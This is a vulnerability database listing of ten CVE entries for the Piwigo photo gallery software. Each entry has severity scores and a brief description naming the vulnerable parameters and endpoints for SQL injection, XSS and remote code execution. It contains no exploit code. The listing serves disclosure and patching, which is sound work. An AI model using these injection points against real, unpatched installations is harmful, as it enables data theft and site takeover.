CVSS: 6.4EPSS: 0%CPEs: 1EXPL: 3CVE-2024-43018
https://notcve.org/view.php?id=CVE-2024-43018
29 Jul 2025 — Piwigo 13.8.0 and below is vulnerable to SQL Injection in the parameters max_level and min_register. These parameters are used in ws_user_gerList function from file include\ws_functions\pwg.users.php and this same function is called by ws.php file at some point can be used for searching users in advanced way in /admin.php?page=user_list. Piwigo 13.8.0 y versiones anteriores son vulnerables a la inyección SQL en los parámetros max_level y min_register. Estos parámetros se utilizan en la función ws_user_gerLi... • https://github.com/Piwigo/Piwigo/issues/2197 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.3EPSS: 4%CPEs: 4EXPL: 1CVE-2023-44393 – Piwigo Reflected XSS vulnerability
https://notcve.org/view.php?id=CVE-2023-44393
09 Oct 2023 — Piwigo is an open source photo gallery application. Prior to version 14.0.0beta4, a reflected cross-site scripting (XSS) vulnerability is in the` /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=[here]` page. This vulnerability can be exploited by an attacker to inject malicious HTML and JS code into the HTML page, which could then be executed by admin users when they visit the URL with the payload. The vulnerability is caused by the insecure injection of the `plugin_id` value from the URL into th... • https://github.com/Piwigo/Piwigo/commit/cc99c0f1e967c5f1722a0cce30ff42374a7bbc23 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) •
CVSS: 9.0EPSS: 64%CPEs: 1EXPL: 1CVE-2023-37270 – Piwigo SQL Injection vulnerability in "User-Agent"
https://notcve.org/view.php?id=CVE-2023-37270
07 Jul 2023 — Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. • https://github.com/Piwigo/Piwigo/blob/c01ec38bc43f09424a8d404719c35f963d63cf00/include/dblayer/functions_mysqli.inc.php#L491 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 4.3EPSS: 0%CPEs: 1EXPL: 1CVE-2023-34626
https://notcve.org/view.php?id=CVE-2023-34626
15 Jun 2023 — Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function. • https://github.com/Piwigo/Piwigo/issues/1924 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-27233
https://notcve.org/view.php?id=CVE-2023-27233
17 May 2023 — Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. • https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.0EPSS: 37%CPEs: 1EXPL: 3CVE-2023-26876 – Piwigo CVE-2023-26876 Gather Credentials via SQL Injection
https://notcve.org/view.php?id=CVE-2023-26876
21 Apr 2023 — SQL injection vulnerability found in Piwigo v.13.5.0 and before allows a remote attacker to execute arbitrary code via the filter_user_id parameter to the admin.php?page=history&filter_image_id=&filter_user_id endpoint. Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability. • https://packetstorm.news/files/id/172059 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 1CVE-2022-32297
https://notcve.org/view.php?id=CVE-2022-32297
14 Jul 2022 — Piwigo v12.2.0 was discovered to contain SQL injection vulnerability via the Search function. Se ha detectado que Piwigo versión v12.2.0, contiene una vulnerabilidad de inyección SQL por medio de la función Search • https://github.com/sth276/research/blob/main/piwigo_vul/Second-Order%20SQL%20Injection%20Vulnerabilities%20in%20Piwigo.md • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 8.8EPSS: 2%CPEs: 1EXPL: 1CVE-2021-40553
https://notcve.org/view.php?id=CVE-2021-40553
28 Jun 2022 — piwigo 11.5.0 is affected by a remote code execution (RCE) vulnerability in the LocalFiles Editor. piwigo versión 11.5.0, está afectado por una vulnerabilidad de ejecución de código remota (RCE) en el Editor de Archivos Locales • https://github.com/Yang9999999/vuln/blob/main/README.md • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 1CVE-2021-40678
https://notcve.org/view.php?id=CVE-2021-40678
14 Jun 2022 — In Piwigo 11.5.0, there exists a persistent cross-site scripting in the single mode function through /admin.php?page=batch_manager&mode=unit. En Piwigo versión 11.5.0, se presenta una vulnerabilidad de tipo cross-site scripting persistente en la función de modo único mediante /admin.php?page=batch_manager&mode=unit • https://github.com/Piwigo/Piwigo/issues/1476 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 1CVE-2021-40317
https://notcve.org/view.php?id=CVE-2021-40317
26 May 2022 — Piwigo 11.5.0 is affected by a SQL injection vulnerability via admin.php and the id parameter. Piwigo versión 11.5.0, está afectado por una vulnerabilidad de inyección SQL por medio del archivo admin.php y el parámetro id • https://github.com/Piwigo/Piwigo/issues/1470 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •